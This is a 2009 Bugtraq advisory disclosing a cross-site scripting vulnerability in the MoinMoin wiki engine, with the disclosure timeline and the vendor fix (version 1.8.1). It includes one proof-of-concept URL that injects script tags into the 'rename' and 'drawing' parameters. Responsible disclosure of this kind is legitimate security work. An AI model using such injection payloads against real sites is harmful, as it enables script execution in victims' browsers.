MoinMoin Wiki Engine XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MoinMoin Wiki Engine XSS Vulnerability
From: swhite@xxxxxxxxxxxxxxx
Date: Tue, 20 Jan 2009 09:25:32 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

MoinMoin Wiki Engine Cross-Site Scripting

Discovered by: SecureState R&D Team (sasquatch)

Website: www.securestate.com

Discovered: 01-08-09

Vendor Notified: 01-08-09

Vendor Fix Issued:  01-11-09 (http://hg.moinmo.in/moin/1.8/rev/8cb4d34ccbc1)

Vendor Fix:  Upgrade to version 1.8.1 

Public Posting: 01-19-09

Example:
http://moinmo.in/moinmoin/WikiSandBox?rename=";><script>alert('rename 
xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>

Prev by Date: Re: Remote Cisco IOS FTP exploit
Next by Date: Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server
Previous by thread: [ANNOUNCE] Apache Jackrabbit 1.5.2 released
Next by thread: Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server
Index(es):
- Date
- Thread